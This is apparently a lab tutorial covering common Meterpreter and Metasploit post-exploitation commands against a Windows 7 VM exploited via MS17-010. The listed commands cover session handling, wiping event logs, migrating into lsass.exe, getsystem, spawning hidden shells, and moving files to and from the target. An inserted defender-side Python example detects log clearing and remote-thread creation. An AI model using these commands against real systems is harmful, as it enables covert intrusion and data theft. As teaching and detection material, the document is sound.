Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands
I thought that it would be useful, for some readers, if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit.
In this first video, we will discuss the Core, System, Networking and File System commands.
LAB details - VM names and IP addresses
Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3
Exploitation process
The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit
Core and System commands
We will start with Core and System commands and obviously the first command should be ... HELP ! :-)
1. help
See below the help output for the Core and System commands:
2. sysinfo
Use "sysinfo" to get essential information about the target computer: machine name, operating system, OS architecture (x86/x64), system language and domain name.
3. getuid
The Meterpreter server is running on the target computer under a specific user context. That user context determines the level of permissions that the attacker has on the target computer. Obviously, we would like to have the highest level of permissions (system / local admin).
The "getuid" command will display the user context used by Meterpreter.
In our case, Meterpreter is running as SYSTEM, therefore it has all the available permissions.
4. background
There are situations when we successfully exploit a target and get to a Meterpreter prompt, but need to get back to a Metasploit prompt in order to run other commands, without disconnecting the previously established Meterpreter session.
In that situation we would run the "background" command. The Meterpreter session will be sent into the background and we will get back to the Metasploit prompt. The Meterpreter session stays connected in the background, waiting to be reactivated.
5. sessions -l (or sessions)
Let's say that we successfully exploited multiple targets and we have multiple Meterpreter sessions running in the background.
The "sessions" command, depending on the command option, allows listing, resuming or terminating the Meterpreter sessions. See all the available options in the picture below:
"sessions -l" (or "sessions") will list all the active Meterpreter sessions
A Meterpreter session is identified by the session ID number.
(Session ID is 1 in the picture shown above)
6. sessions -i <Session_ID>
This command will resume interaction with a Meterpreter session that was previously sent to the background. We will get back to the Meterpreter prompt.
7. clearev
The "clearev" command will remove all the records from the Event Log on the target computer.
8. localtime
This command will display the date and time on the target computer.
9. ps
The "ps" command will list all the processes running on the target computer.
Note that each process is identified by a process ID number or PID.
Also, each process runs under a user context
For example - lsass.exe has PID 512 and runs under the SYSTEM user context
10. ps -U <user_context>
This command will list only the processes running under the specified user context.
Example:
ps -U 'TESTLAB3\\testuser1'
11. ps -s
This command will list all the processes running under the SYSTEM user context.
12. pgrep <Process_Name>
This command will return the PID for the specified process name.
Example:
pgrep wordpad
13. getpid
The "getpid" command will return the PID under which the Meterpreter server is currently running.
In this case, the PID is 1040.
14. migrate <New_PID>
This command will migrate the Meterpreter server from the current process to a new process having <New_PID>.
Example:
migrate 512
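From the defender's side, two of the commands above leave distinctive traces: "clearev" (item 7) makes Windows write a "log cleared" record (Event ID 1102 in the Security log, 104 in the System log) before the log is emptied, and "migrate" (item 14) creates a thread inside another process, which Sysmon reports as Event ID 8. The Python below is an added example, not part of the original post or of Metasploit; it runs those two detection rules over constructed sample records, and the flattened field layout (Channel, EventID, SourceImage, TargetImage, StartModule, ...) is an assumption modelled on a winlogbeat-style export.

```python
# Constructed sample events (not real logs) in a flattened, winlogbeat-style
# layout: Channel, EventID, plus the event-specific fields the rules need.
SAMPLE_EVENTS = [
    # "clearev": Windows records the clearing itself before the log is emptied
    # (1102 in Security, 104 in System), so the wipe is its own indicator.
    {"Channel": "Security", "EventID": 1102, "Computer": "W7X64-1",
     "SubjectUserName": "SYSTEM"},
    {"Channel": "System", "EventID": 104, "Computer": "W7X64-1",
     "SubjectUserName": "SYSTEM"},
    # "migrate 512": a remote thread created in lsass.exe (PID 512, as on the
    # page) from the process hosting Meterpreter (source image is constructed).
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 8,
     "SourceImage": "C:\\Windows\\System32\\spoolsv.exe", "SourceProcessId": 1040,
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "TargetProcessId": 512,
     "StartModule": ""},
    # Benign remote thread with a module-backed start address, to show that
    # the rule does not fire on every Sysmon event 8.
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 8,
     "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 400,
     "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 3300,
     "StartModule": "C:\\Windows\\System32\\ntdll.dll"},
]

# Processes an implant is commonly migrated into; a new thread in them from an
# unrelated process deserves a look.
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe", "services.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (rule, message) pairs for events matching either rule."""
    alerts = []
    for e in events:
        ch, eid = e.get("Channel", ""), e.get("EventID")
        if (ch, eid) in {("Security", 1102), ("System", 104)}:
            alerts.append(("log_cleared", f"{ch} log cleared on "
                           f"{e.get('Computer')} by {e.get('SubjectUserName')}"))
        elif eid == 8 and ch.endswith("Sysmon/Operational"):
            target = basename(e.get("TargetImage", ""))
            # Sensitive target, or start address not backed by any loaded module
            if target in SENSITIVE_TARGETS or not e.get("StartModule"):
                alerts.append(("remote_thread", f"{basename(e.get('SourceImage', ''))} "
                               f"(pid {e.get('SourceProcessId')}) created a thread in "
                               f"{target} (pid {e.get('TargetProcessId')})"))
    return alerts
```

Running detect(SAMPLE_EVENTS) returns two log_cleared alerts and one remote_thread alert; the csrss.exe thread into notepad.exe is not reported.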
15. kill <PID>
This command will terminate a process running on the target computer, having the specified <PID>.
Example:
kill 2920
16. pkill <Process_Name>
This command will terminate a process specified by name.
17. getsystem
This command will attempt to elevate the Meterpreter permissions on the target machine to SYSTEM (local admin) level.
In our lab, Meterpreter is already running under the SYSTEM user context, so the "getsystem" command is not going to achieve anything.
18. shell
This command will launch a system command shell on the target machine. After that, we can run any commands directly on the target machine.
"exit" will terminate the command shell and we will get back to the Meterpreter prompt.
19. execute
This command will execute a specified command or application on the target machine. Check the available options in the picture below:
Example:
execute -f cmd.exe -i -H
will launch a command shell on the target machine. The process will be hidden from view and we can interact with the shell after creating it.
20. reboot
This command will reboot the target computer. See the available options in the picture below:
File System commands
21. show_mount
This command will list all the logical drives and mount points available on the target computer.
22. lpwd
The "lpwd" command will display the local working directory, on the Kali computer
23. lcd <New_Path>
This command allows changing the local working directory to <New_Path>
Example:
lcd /root/TEMP
24. pwd
"pwd" will display the remote working directory, on the target machine
25. cd <New_Path>
This command will change the remote working directory to <New_Path>
Example:
cd \
Note: Some File System commands use the local and/or remote working directory by default, unless a particular directory is specified.
26. dir or ls
This command will list the files located in the remote working directory (on the target computer)
Of course, we can also use this command by specifying a particular directory.
27. cat <File_Name>
The "cat" command will display the contents of the specified file, to the screen
Example:
cat test1.txt
28. search
This command will search for a specified file or file pattern on the target computer
Example:
search -f *.txt -d 'c:\\TMP'
will search for text files in the c:\TMP directory (on the target computer)
29. edit
This command will edit the specified file
Example:
edit C:\\TMP\\test1.txt
Use :qa! to exit
30. download
This command will download files from the target computer to the local Kali computer
Examples:
download c:\\tmp\\test1.txt
will download the c:\tmp\test1.txt file to the local working directory.
download *.jpg
will download the jpeg files located in the remote working directory to the local working directory
31. rm
The "rm" command will delete the specified file(s) from the target computer
Example:
rm test3.txt
32. upload
This command will upload files from the local Kali computer to the target computer.
Example:
upload test3.txt
will upload the test3.txt file located in the local working directory, to the remote working directory, on the target computer
Networking commands
33. arp
This command will display the ARP cache on the target computer
34. ipconfig or ifconfig
This command will display the network interfaces and the IP configuration on the target computer
35. netstat
This command will provide information about protocols in use and network connections, on the target computer
36. route
This command will display and edit the routing table, on the target computer
37. resolve
This command will resolve host names, on the target computer
Example:
resolve w2008r21
will resolve the "w2008r21" name (that's the lab DC name)